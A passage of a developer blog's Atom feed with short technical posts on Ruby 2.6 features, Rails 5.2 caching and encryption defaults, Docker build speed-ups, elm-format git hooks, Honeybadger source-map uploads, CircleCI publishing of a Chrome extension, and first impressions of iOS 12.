<code>tmp/cache/assets</code> and <code>public/assets</code> directories from the previous build into the current build, the <code>bundle install</code> and <code>rake assets:precompile</code> commands reuse the cache and perform faster.</p><p>The updated Dockerfile has fewer instructions now.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latest

ENV APP_PATH /data/app/
WORKDIR $APP_PATH

ADD . $APP_PATH

CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>With this approach, the average Jenkins build time is now between 3.5 and 4.5 minutes.</p><p>The following graph shows the build time trend of some recent builds on our Jenkins server.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/build-time-trend-after-speedup-tweaks.png" alt="Screenshot of build time trend graph after speedup tweaks"></p><p>Please note that the spikes in the above graph show that certain Jenkins builds sometimes took more than 5 minutes due to concurrently running builds at the time. Because our Jenkins server has a limited set of resources, concurrently running builds often run longer than estimated.</p><p>We are still looking to improve the containerization speed further while keeping the image size small. Please let us know if there's anything else we can do to improve the containerization process.</p><p>Note that our Jenkins server runs on Ubuntu, which is based on Debian. Our base Docker image is also based on Debian. Some of the gems in our Gemfile are native extensions written in C. The gems pre-installed on the Jenkins machine have been working without any issues while running inside the Docker containers on Kubernetes. This may not hold if the two platforms differ, since native-extension gems installed on the Jenkins host may fail to work inside the Docker container.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Binding#source_location]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-binding-source-location"/>
      <updated>2018-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-binding-source-location</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we wanted to know the file name with location and line number of source code, we would need to use <code>Binding#eval</code>.</p><pre><code class="language-ruby">binding.eval('[__FILE__, __LINE__]')
=&gt; [&quot;/Users/taha/blog/app/controllers/application_controller&quot;, 2]</code></pre><p>Ruby 2.6 adds the more readable method <code>Binding#source_location</code> to achieve a similar result.</p><pre><code class="language-ruby">binding.source_location
=&gt; [&quot;/Users/taha/blog/app/controllers/application_controller&quot;, 2]</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/571e48">commit</a> and <a href="https://bugs.ruby-lang.org/issues/14230">discussion</a> for this change.</p><p>The Chinese version of this blog is available <a href="http://madao.me/yi-ruby-2-6-binding-dui-xiang-zeng-jia-source_location-fang-fa/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds String#split with block]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-split-with-block"/>
      <updated>2018-07-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-split-with-block</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, <a href="http://ruby-doc.org/core-2.5.1/String.html#method-i-split">String#split</a> returned an array of split strings.</p><p>In Ruby 2.6, a block can be passed to <code>String#split</code>, which yields each split string and operates on it. This avoids creating an intermediate array and thus is memory efficient.</p><p>We will add a method <code>is_fruit?</code> to understand how to use <code>split</code> with a block.</p><pre><code class="language-ruby">def is_fruit?(value)
  %w(apple mango banana watermelon grapes guava lychee).include?(value)
end</code></pre><p>The input is a comma-separated string with vegetable and fruit names. The goal is to fetch the fruit names from the input string and store them in an array.</p><h5>String#split</h5><pre><code class="language-ruby">input_str = &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;

splitted_values = input_str.split(&quot;, &quot;)
=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;potato&quot;, &quot;banana&quot;, &quot;cabbage&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]

fruits = splitted_values.select { |value| is_fruit?(value) }
=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;banana&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]</code></pre><p>Using <code>split</code>, an intermediate array is created which contains both fruit and vegetable names.</p><h5>String#split with a block</h5><pre><code class="language-ruby">fruits = []

input_str = &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;

input_str.split(&quot;, &quot;) { |value| fruits &lt;&lt; value if is_fruit?(value) }
=&gt; &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;

fruits
=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;banana&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]</code></pre><p>When a block is passed to <code>split</code>, it returns the string on which <code>split</code> was called and does not create an array. <code>String#split</code> yields the block for each split string, which in our case pushes fruit names into a separate array.</p><h4>Update</h4><h5>Benchmark</h5><p>We created a large random string to benchmark the performance of <code>split</code> and <code>split</code> with a block.</p><pre><code class="language-ruby">require 'securerandom'

test_string = ''

100_000.times.each do
  test_string += SecureRandom.alphanumeric(10)
  test_string += ' '
end</code></pre><pre><code class="language-ruby">require 'benchmark'

Benchmark.bmbm do |bench|
  bench.report('split') do
    arr = test_string.split(' ')
    str_starts_with_a = arr.select { |str| str.start_with?('a') }
  end

  bench.report('split with block') do
    str_starts_with_a = []
    test_string.split(' ') { |str| str_starts_with_a &lt;&lt; str if str.start_with?('a') }
  end
end</code></pre><p>Results</p><pre><code class="language-plaintext">Rehearsal ----------------------------------------------------
split              0.023764   0.000911   0.024675 (  0.024686)
split with block   0.012892   0.000553   0.013445 (  0.013486)
------------------------------------------- total: 0.038120sec

                       user     system      total        real
split              0.024107   0.000487   0.024594 (  0.024622)
split with block   0.010613   0.000334   0.010947 (  0.010991)</code></pre><p>We did another iteration of benchmarking using <a href="https://github.com/evanphx/benchmark-ips">benchmark/ips</a>.</p><pre><code class="language-ruby">require 'benchmark/ips'

Benchmark.ips do |bench|
  bench.report('split') do
    splitted_arr = test_string.split(' ')
    str_starts_with_a = splitted_arr.select { |str| str.start_with?('a') }
  end

  bench.report('split with block') do
    str_starts_with_a = []
    test_string.split(' ') { |str| str_starts_with_a &lt;&lt; str if str.start_with?('a') }
  end

  bench.compare!
end</code></pre><p>Results</p><pre><code class="language-plaintext">Warming up --------------------------------------
               split     4.000  i/100ms
    split with block    10.000  i/100ms
Calculating -------------------------------------
               split     46.906  (± 2.1%) i/s -    236.000  in   5.033343s
    split with block    107.301  (± 1.9%) i/s -    540.000  in   5.033614s

Comparison:
    split with block:      107.3 i/s
               split:       46.9 i/s - 2.29x  slower</code></pre><p>This benchmark shows that <code>split</code> with a block is about 2.3 times faster than plain <code>split</code>.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/2258a97fe2b21da9ec294ccedd00b3bbbc85cb07">commit</a> and <a href="https://bugs.ruby-lang.org/issues/4780">discussion</a> for this change.</p><p>The Chinese version of this blog is available <a href="http://madao.me/yi-ruby-2-6-stringde-split-fang-fa-zhi-chi-dai-ma-kuai-zhi-xing/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to upload source maps to Honeybadger]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-upload-source-maps-to-honeybadger"/>
      <updated>2018-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-upload-source-maps-to-honeybadger</id>
      <content type="html"><![CDATA[<p>During the development of a Chrome extension, debugging was difficult because the line numbers of a minified JavaScript file are of no use without a source map. Previously, Honeybadger could only download source map files which were public, and our source maps were inside the <code>.crx</code> package, which was inaccessible to Honeybadger.</p><p>Recently, Honeybadger released a new <a href="http://blog.honeybadger.io/source-map-upload/">feature</a> to upload source maps to Honeybadger. We have written a grunt plugin to upload the source maps to Honeybadger.</p><p>Here is how we can upload source maps to Honeybadger.</p><p>First, install the grunt plugin.</p><pre><code class="language-bash">npm install --save-dev grunt-honeybadger-sourcemaps</code></pre><p>Configure the gruntfile.</p><pre><code class="language-javascript">grunt.initConfig({
  honeybadger_sourcemaps: {
    default_options: {
      options: {
        appId: &quot;xxxx&quot;,
        token: &quot;xxxxxxxxxxxxxx&quot;,
        urlPrefix: &quot;http://example.com/&quot;,
        revision: &quot;&lt;app version&gt;&quot;,
        prepareUrlParam: function(fileSrc) {
          // Here we can manipulate the file path
          return fileSrc.replace('built/', '');
        },
      },
      files: [{
        src: ['@path/to/**/*.map']
      }],
    }
  },
});

grunt.loadNpmTasks('grunt-honeybadger-sourcemaps');
grunt.registerTask('upload_sourcemaps', ['honeybadger_sourcemaps']);</code></pre><p>We can get the <code>appId</code> and <code>token</code> from the Honeybadger project settings.</p><pre><code class="language-plaintext">grunt upload_sourcemaps</code></pre><p>Now, we can upload the source maps to Honeybadger and get a better error stack trace.</p><h2>Testing</h2><p>Clone the following repo.</p><pre><code class="language-bash">git clone https://github.com/bigbinary/grunt-honeybadger-sourcemaps</code></pre><p>Replace <code>appId</code> and <code>token</code> in Gruntfile.js and run <code>grunt test</code>. It should upload the sample source maps to your project.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 raises exception for else without rescue]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.6-raise-exception-for-else-without-rescue"/>
      <updated>2018-07-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.6-raise-exception-for-else-without-rescue</id>
      <content type="html"><![CDATA[<h4>Ruby 2.5</h4><p>If we use <code>else</code> without <code>rescue</code> inside a <code>begin..end</code> block in Ruby 2.5, it gives a warning.</p><pre><code class="language-ruby">irb(main):001:0&gt; begin
irb(main):002:1&gt; puts &quot;Inside begin block&quot;
irb(main):003:1&gt; else
irb(main):004:1&gt; puts &quot;Inside else block&quot;
irb(main):005:1&gt; end
(irb):5: warning: else without rescue is useless</code></pre><p>This warning is present because code inside the <code>else</code> block will never get executed.</p><h4>Ruby 2.6</h4><p>Ruby 2.6 raises an exception if we use <code>else</code> without <code>rescue</code> in a <code>begin..end</code> block. This <a href="https://github.com/ruby/ruby/commit/140512d2225e6fd046ba1bdbcd1a27450f55c233#diff-ff4e2dc4962dc25a1512353299992c8d">commit</a> changed the warning into an exception in Ruby 2.6. The changes made in the commit are experimental.</p><pre><code class="language-ruby">irb(main):001:0&gt; begin
irb(main):002:1&gt; puts &quot;Inside begin block&quot;
irb(main):003:1&gt; else
irb(main):004:1&gt; puts &quot;Inside else block&quot;
irb(main):005:1&gt; end
Traceback (most recent call last):
        1: from /usr/local/bin/irb:11:in `&lt;main&gt;'
SyntaxError ((irb):3: else without rescue is useless)</code></pre><p>The Chinese version of this blog is available <a href="http://madao.me/yi-ruby-2-6-hui-zai-begin-end-dai-ma-kuai-zhong-yin-wei-bu-xie-rescue-zhi-xie-else-er-pao-chu-yi-chang-shi-yan-xing-feature">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Auto-format Elm code with elm-format before commit]]></title>
       <author><name>Ritesh Pillai</name></author>
      <link href="https://www.bigbinary.com/blog/format-your-elm-code-with-elm-format-before-committing"/>
      <updated>2018-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/format-your-elm-code-with-elm-format-before-committing</id>
      <content type="html"><![CDATA[<p>In one of our earlier posts <a href="https://blog.bigbinary.com/2017/06/12/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files.html">we talked about</a> how we set up <a href="https://github.com/prettier/prettier">prettier</a> and <a href="https://github.com/bbatsov/rubocop">rubocop</a> to automatically format our JavaScript and Ruby code on git commit.</p><p>Recently we started working with Elm in a couple of our projects - <a href="https://github.com/bigbinary/apisnapshot">APISnapshot</a> and <a href="https://github.com/bigbinary/acehelp">AceHelp</a>.</p><p>Tools like prettier and rubocop have really helped us take a load off our minds with regard to formatting code. And one of the very first things we wanted to sort out when we started doing Elm was pretty printing our Elm code.</p><p><a href="https://github.com/avh4/elm-format">elm-format</a>, created by <a href="https://github.com/avh4">Aaron VonderHaar</a>, formats Elm source code according to a standard set of rules based on the official <a href="http://elm-lang.org/docs/style-guide">Elm Style Guide</a>.</p><h2>Automatic code formatting</h2><p>Let's set up a git hook to automatically take care of code formatting. We can achieve this much like how we did it in our previous <a href="https://blog.bigbinary.com/2017/06/12/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files.html">post</a>, using <a href="https://github.com/typicode/husky/tree/v0.14.3">Husky</a> and <a href="https://github.com/okonet/lint-staged">Lint-staged</a>.</p><p>Let's add Husky and lint-staged as dev dependencies to our project, and for completeness also include elm-format as a dev dependency.</p><pre><code class="language-bash">npm install --save-dev husky lint-staged elm-format</code></pre><p>Husky makes it really easy to create git hooks. Git hooks are scripts that are executed by git before or after an event. We will be using the <code>pre-commit</code> hook, which runs after you do a <code>git commit</code> command but before you type in a commit message.</p><p>This way we can change and format the files that are about to be committed by running elm-format via Husky.</p><p>But there is one problem here. The changed files do not get added back to our commit.</p><p>This is where Lint-staged comes in. Lint-staged is built to run linters on staged files. So instead of running elm-format in a pre-commit hook, we run lint-staged, and we configure lint-staged such that elm-format is run on all staged Elm files.</p><p>We can also include Prettier to take care of all staged JavaScript files.</p><p>Let's do this by editing our <code>package.json</code> file.</p><pre><code class="language-json">{
  &quot;scripts&quot;: {
    &quot;precommit&quot;: &quot;lint-staged&quot;
  },
  &quot;lint-staged&quot;: {
    &quot;*.elm&quot;: [&quot;elm-format --yes&quot;, &quot;git add&quot;],
    &quot;*.js&quot;: [&quot;prettier --write&quot;, &quot;git add&quot;]
  }
}</code></pre><p>All set and done!</p><p>Now whenever we do a <code>git commit</code> command, all our staged Elm and JavaScript files will get properly formatted before the commit goes in.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds endless range]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-endless-range"/>
      <updated>2018-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-endless-range</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we wanted an endless loop with an index, we would need to use <a href="http://ruby-doc.org/core-2.5.1/Float.html#INFINITY">Float::INFINITY</a> with <a href="http://ruby-doc.org/core-2.5.1/Integer.html#method-i-upto">upto</a> or <a href="http://ruby-doc.org/core-2.5.1/Range.html">Range</a>, or use <a href="http://ruby-doc.org/core-2.5.1/Numeric.html#method-i-step">Numeric#step</a>.</p><h5>Ruby 2.5.0</h5><pre><code class="language-ruby">irb&gt; (1..Float::INFINITY).each do |n|
irb*   # logic goes here
irb&gt; end</code></pre><p>OR</p><pre><code class="language-ruby">irb&gt; 1.step.each do |n|
irb*   # logic goes here
irb&gt; end</code></pre><h4>Ruby 2.6.0</h4><p>Ruby 2.6 makes an infinite loop more readable by changing the mandatory second argument of a range to optional. Internally, Ruby sets the second argument to <code>nil</code> if it is not provided. So both <code>(0..)</code> and <code>(0..nil)</code> are the same in Ruby 2.6.</p><h6>Using an endless loop in Ruby 2.6</h6><pre><code class="language-ruby">irb&gt; (0..).each do |n|
irb*   # logic goes here
irb&gt; end</code></pre><pre><code class="language-ruby">irb&gt; (0..nil).size
=&gt; Infinity

irb&gt; (0..).size
=&gt; Infinity</code></pre><p>In Ruby 2.5, <code>nil</code> is not an acceptable argument and <code>(0..nil)</code> would throw an <code>ArgumentError</code>.</p><pre><code class="language-ruby">irb&gt; (0..nil)
ArgumentError (bad value for range)</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/7f95eed19e22cb9a4867819355fe4ab99f85fd16">commit</a> and <a href="https://bugs.ruby-lang.org/issues/12912">discussion</a> for this change.</p><p>The Chinese version of this blog is available <a href="http://madao.me/yi-ruby-2-6-zeng-jia-wu-qiong-fan-wei/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 added method write_multi to cache store]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5.2-adds-write_multi-for-cache-writes"/>
      <updated>2018-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5.2-adds-write_multi-for-cache-writes</id>
      <content type="html"><![CDATA[<p>Before Rails 5.2 it was not possible to write multiple entries to a cache store in one shot, even though cache stores like Redis have the <a href="https://redis.io/commands/mset"><code>MSET</code></a> command to set multiple keys in a single atomic operation. We were not able to use this feature of Redis because of the way Rails had implemented caching.</p><p>Rails implements caching using an abstract class, <code>ActiveSupport::Cache::Store</code>, which defines the interface that all cache store classes should implement. Rails also provides some common functionality that all cache store classes will need.</p><p>Prior to Rails 5.2, <code>ActiveSupport::Cache::Store</code> didn't have any method to set multiple entries at once.</p><p>In Rails 5.2, <a href="https://github.com/rails/rails/pull/29366">write_multi was added</a>. Each cache store can implement this method and provide the functionality to add multiple entries at once. If a cache store does not implement this method, then the default implementation loops over each key-value pair and sets it individually using the <code>write_entry</code> method.</p><p>Multiple entries can be set as shown here.</p><pre><code class="language-ruby">Rails.cache.write_multi name: 'Alan Turing', country: 'England'</code></pre><p>The <a href="https://github.com/redis-store/redis-rails">redis-rails</a> gem provides Redis as a cache store. However, it does not implement the <code>write_multi</code> method.</p><p>If we are using Rails 5.2, then there is no point in using the <code>redis-rails</code> gem, as Rails 5.2 comes with built-in support for a Redis cache store, which implements the <code>write_multi</code> method. It was added by <a href="https://github.com/rails/rails/pull/31134">this PR</a>.</p><p>We need to make the following change.</p><pre><code class="language-ruby"># before
config.cache_store = :redis_store

# after
config.cache_store = :redis_cache_store</code></pre><p>The <code>redis-rails</code> repo has a <a href="https://github.com/redis-store/redis-rails/pull/81">pull request</a> to notify users that development of this gem has ceased. So it's better to use the Redis cache store that comes with Rails 5.2.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Continuous release of a chrome extension using CircleCI]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/continuously-upload-chrome-extension-with-circleci"/>
      <updated>2018-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/continuously-upload-chrome-extension-with-circleci</id>
      <content type="html"><![CDATA[<p>We have recently worked on many Chrome extensions. Releasing new Chrome extensions manually gets tiring after a while.</p><p>So, we thought about automating it with CircleCI, similar to continuous deployment.</p><p>We are using the following configuration in <code>circle.yml</code> to continuously release Chrome extensions from the master branch.</p><pre><code class="language-yaml">workflows:
  version: 2
  main:
    jobs:
      - test:
          filters:
            branches:
              ignore: []
      - build:
          requires:
            - test
          filters:
            branches:
              only: master
      - publish:
          requires:
            - build
          filters:
            branches:
              only: master

version: 2
jobs:
  test:
    docker:
      - image: cibuilds/base:latest
    steps:
      - checkout
      - run:
          name: &quot;Install Dependencies&quot;
          command: |
            apk add --no-cache yarn
            yarn
      - run:
          name: &quot;Run Tests&quot;
          command: |
            yarn run test
  build:
    docker:
      - image: cibuilds/chrome-extension:latest
    steps:
      - checkout
      - run:
          name: &quot;Install Dependencies&quot;
          command: |
            apk add --no-cache yarn
            apk add --no-cache zip
            yarn
      - run:
          name: &quot;Package Extension&quot;
          command: |
            yarn run build
            zip -r build.zip build
      - persist_to_workspace:
          root: /root/project
          paths:
            - build.zip
  publish:
    docker:
      - image: cibuilds/chrome-extension:latest
    environment:
      - APP_ID: &lt;APP_ID&gt;
    steps:
      - attach_workspace:
          at: /root/workspace
      - run:
          name: &quot;Publish to the Google Chrome Store&quot;
          command: |
            ACCESS_TOKEN=$(curl &quot;https://accounts.google.com/o/oauth2/token&quot; -d &quot;client_id=${CLIENT_ID}&amp;client_secret=${CLIENT_SECRET}&amp;refresh_token=${REFRESH_TOKEN}&amp;grant_type=refresh_token&amp;redirect_uri=urn:ietf:wg:oauth:2.0:oob&quot; | jq -r .access_token)
            curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -X PUT -T /root/workspace/build.zip -v &quot;https://www.googleapis.com/upload/chromewebstore/v1.1/items/${APP_ID}&quot;
            curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -H &quot;Content-Length: 0&quot; -X POST -v &quot;https://www.googleapis.com/chromewebstore/v1.1/items/${APP_ID}/publish&quot;</code></pre><p>We have created three jobs named <code>test</code>, <code>build</code> and <code>publish</code> and used these jobs in our workflow to run tests, build the extension, and publish it to the Chrome store, respectively. Every step requires the previous step to run successfully.</p><p>Let's check each job one by one.</p><pre><code class="language-yaml">test:
  docker:
    - image: cibuilds/base:latest
  steps:
    - checkout
    - run:
        name: &quot;Install Dependencies&quot;
        command: |
          apk add --no-cache yarn
          yarn
    - run:
        name: &quot;Run Tests&quot;
        command: |
          yarn run test</code></pre><p>We use the <a href="https://github.com/cibuilds/base">cibuilds</a> docker image for this job. First, we check out the branch and then use <code>yarn</code> to install dependencies. Alternatively, we can use <code>npm</code> to install dependencies as well. Then, as the last step, we use <code>yarn run test</code> to run the tests. We can skip this step if running tests is not needed.</p><pre><code class="language-yaml">build:
  docker:
    - image: cibuilds/chrome-extension:latest
  steps:
    - checkout
    - run:
        name: &quot;Install Dependencies&quot;
        command: |
          apk add --no-cache yarn
          apk add --no-cache zip
          yarn
    - run:
        name: &quot;Package Extension&quot;
        command: |
          yarn run build
          zip -r build.zip build
    - persist_to_workspace:
        root: /root/project
        paths:
          - build.zip</code></pre><p>For building Chrome extensions, we use the <a href="https://github.com/cibuilds/chrome-extension">chrome-extension</a> image. Here, we also first do a checkout and then install dependencies using yarn. Note that we install the zip utility along with yarn because we need to zip our Chrome extension before publishing it in the next step. Also, we are not generating version numbers on our own. The version number will be picked from the manifest file. This step assumes that we have a task named <code>build</code> in <code>package.json</code> to build our app.</p><p>The Chrome store rejects multiple uploads with the same version number.
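One way to guarantee a fresh version number on every release is to bump the patch component of the manifest just before the build job runs. A minimal sketch (the manifest contents and bump logic here are illustrative, not part of the configuration above):

```shell
# Illustrative manifest; a real extension's manifest.json has more fields.
cat > manifest.json <<'EOF'
{
  "name": "demo-extension",
  "version": "1.2.3",
  "manifest_version": 2
}
EOF

# Read the current version, increment the patch component, and write it back.
current=$(sed -n 's/.*"version": *"\([0-9.]*\)".*/\1/p' manifest.json)
patch=${current##*.}
next="${current%.*}.$((patch + 1))"
sed -i.bak "s/\"version\": *\"$current\"/\"version\": \"$next\"/" manifest.json

echo "$next"   # 1.2.4
```

The `-i.bak` suffix keeps the in-place edit portable between GNU and BSD sed.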
So, before this step, we have to make sure the version number in the manifest file is updated and unique.</p><p>In the last step, we use <code>persist_to_workspace</code> to make <code>build.zip</code> available for the next step, publishing.</p><pre><code class="language-yaml">publish:
  docker:
    - image: cibuilds/chrome-extension:latest
  environment:
    - APP_ID: &lt;APP_ID&gt;
  steps:
    - attach_workspace:
        at: /root/workspace
    - run:
        name: &quot;Publish to the Google Chrome Store&quot;
        command: |
          ACCESS_TOKEN=$(curl &quot;https://accounts.google.com/o/oauth2/token&quot; -d &quot;client_id=${CLIENT_ID}&amp;client_secret=${CLIENT_SECRET}&amp;refresh_token=${REFRESH_TOKEN}&amp;grant_type=refresh_token&amp;redirect_uri=urn:ietf:wg:oauth:2.0:oob&quot; | jq -r .access_token)
          curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -X PUT -T /root/workspace/build.zip -v &quot;https://www.googleapis.com/upload/chromewebstore/v1.1/items/${APP_ID}&quot;
          curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -H &quot;Content-Length: 0&quot; -X POST -v &quot;https://www.googleapis.com/chromewebstore/v1.1/items/${APP_ID}/publish&quot;</code></pre><p>For publishing the Chrome extension, we again use the <a href="https://github.com/cibuilds/chrome-extension">chrome-extension</a> image.</p><p>We need <code>APP_ID</code>, <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code> and <code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> to publish our app to the Chrome Web Store.</p><p><code>APP_ID</code> needs to be fetched from the <a href="https://chrome.google.com/webstore/developer/dashboard">Google Webstore Developer Dashboard</a>. <code>APP_ID</code> is unique for each app, whereas <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code> and <code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> can be used for multiple apps.
Since <code>APP_ID</code> is generally public, we specify it in the yml file. <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code> and <code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> are stored as private environment variables using the CircleCI UI. If our app is unlisted in the Chrome store, we need to store <code>APP_ID</code> as a private environment variable as well.</p><p><code>CLIENT_ID</code> and <code>CLIENT_SECRET</code> need to be fetched from the <a href="https://console.developers.google.com/">Google API console</a>. There, we need to select a project and then click on the credentials tab. If there is no project, we need to create one and then access the credentials tab.</p><p><code>REFRESH_TOKEN</code> needs to be fetched from the Google API. It also defines the scope of access for Google APIs. We need to refer to <a href="https://developers.google.com/identity/protocols/OAuth2WebServer">Google OAuth2</a> for obtaining the refresh token. We can use any language library for this.</p><p>In the first step of the <code>publish</code> job, we attach a workspace to access <code>build.zip</code>, which was created previously. Now, using all the tokens obtained previously, we obtain an access token from the Google OAuth API, which must be used to push the app to the Chrome store. Then, we make a <code>PUT</code> request to the Chrome store API to push the app, and then use the same API again to publish the app.</p><p>Uploading via the API has one more advantage over manual upload. A manual upload generally takes up to an hour for the app to show up in the Chrome store, whereas an upload using the Google API generally reflects within 5-10 minutes, assuming the app does not go for a review by Google.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 uses AES-256-GCM authenticated encryption]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-uses-aes-256-gcm-authenticated-encryption-as-default-cipher-for-encrypting-messages"/>
      <updated>2018-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-uses-aes-256-gcm-authenticated-encryption-as-default-cipher-for-encrypting-messages</id>
      <content type="html"><![CDATA[<p>Before Rails 5.2, <code>AES-256-CBC</code> was the default cipher for encrypting messages.</p><p>It was proposed to use <code>AES-256-GCM</code> authenticated encryption as the default cipher for encrypting messages for the following reasons:</p><ul><li>It produces shorter ciphertexts and performs encryption and decryption quickly.</li><li>It is less error prone and more secure.</li></ul><p>So, <code>AES-256-GCM</code> became the <a href="https://github.com/rails/rails/pull/29263">default cipher</a> for encrypting messages in Rails 5.2.</p><p>If we do not want <code>AES-256-GCM</code> as the default cipher for encrypting messages in our Rails application, we can disable it.</p><pre><code class="language-ruby">Rails.application.config.active_support.use_authenticated_message_encryption = false</code></pre><p>The default encryption for cookies and sessions was also updated to use <code>AES-256-GCM</code> <a href="https://github.com/rails/rails/pull/28132">in this pull request</a>.</p><p>If we do not want <code>AES-256-GCM</code> as the default encryption for cookies and sessions, we can disable it too.</p><pre><code class="language-ruby">Rails.application.config.active_support.use_authenticated_cookie_encryption = false</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Our Thoughts on iOS 12]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/ios-12"/>
      <updated>2018-06-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ios-12</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2018/ios-12/ios-12-lock-home-screen.png" alt="iOS 12 on iPhone 8 Red"></p><p>Apple announced iOS 12 at WWDC 2018 a few days back. Being honest, it was a bit disappointing to see some of the most requested features missing from iOS 12. Users have been asking for Dark mode since before iOS 11, along with the ability to set default apps. It's more of an update focussed on performance improvements, usability, and compatibility. The fact that iOS 12 is also available for the iPhones Apple released 5 years back is a great effort from Apple to keep users happy. And unlike the last couple of years, this time we decided to calm our curiosities and installed iOS 12 beta 1 on our devices right away after Apple released it for developers. This blog is based on our experience with iOS 12 on an iPhone 8 Plus.</p><h2>Installing iOS 12 on your iPhone</h2><p>First things first, make sure you have an iPhone 5s or newer. And before getting started, plug your phone into iTunes and take a full backup in case your phone gets bricked while installing iOS 12, which is very unlikely.</p><p>Once done, download and install the <a href="https://beta.thuthuatios.com/en/">beta profile</a> for iOS 12 and then download and update from the Software Update section, just like you install a regular iOS update. It's the straightforward OTA update process you're already familiar with.</p><p><strong>Note: This beta profile is from a third-party developer and is not officially from Apple. Apple will officially release the public beta in around a month.</strong></p><p>We've been running iOS 12 for a week now, and here are our thoughts on the additions and changes introduced in iOS 12.</p><h3>iOS 12 is fast</h3><p>The performance improvements are significant and definitely noticeable. Previously on iOS 11, accessing Spotlight by swiping down from the home screen used to lag.
And not just that, sometimes the keyboard didn't even show up and we had to repeat the same action to make it work. But things are faster and better in iOS 12. The keyboard comes up as soon as Spotlight shows up.</p><p>Another thing we've noticed is that the multitasking shortcut for switching to the last app by 3D touching on the left wasn't that reliable in iOS 11, so much so that it was easier to ignore the feature altogether than to use it, but in iOS 12 the same shortcut is very smooth. There are still times when it doesn't work well, but that's very rare.</p><p>Spotlight widgets load faster in iOS 12 than they used to in iOS 11. Apart from this, 3D touch feels pretty smooth too. It's good to see Apple squeezing out the power to improve the already good performance in iOS.</p><h3>Notifications</h3><p>&lt;section style=&quot;float: right; max-width: 280px; margin-left: 30px;&quot;&gt;&lt;img src=&quot;/blog_images/2018/ios-12/ios-12-notifications.png&quot; alt=&quot;Notifications in iOS 12&quot;&gt;&lt;/section&gt;</p><p>Notifications in iOS 11 are a mess: there's no grouping, no way to quickly control notifications, no way to set priorities. Apple has added notification grouping and better notification management in iOS 12, so now notifications from the same app are grouped together and you can control how often you want to get notifications from an app right from the notification.</p><p>We think the implementation can be a whole lot better. For notifications that are grouped, you get to see only the last notification from that app; a better way would've been to show two or three notifications and cut the rest. There's no notification pinning or snoozing, which could've been very useful features.</p><h3>Screen time and App limits</h3><p>There's a new feature in iOS 12 called Screen Time which is more like a bird's-eye view of your phone usage. There's a saying that you can't 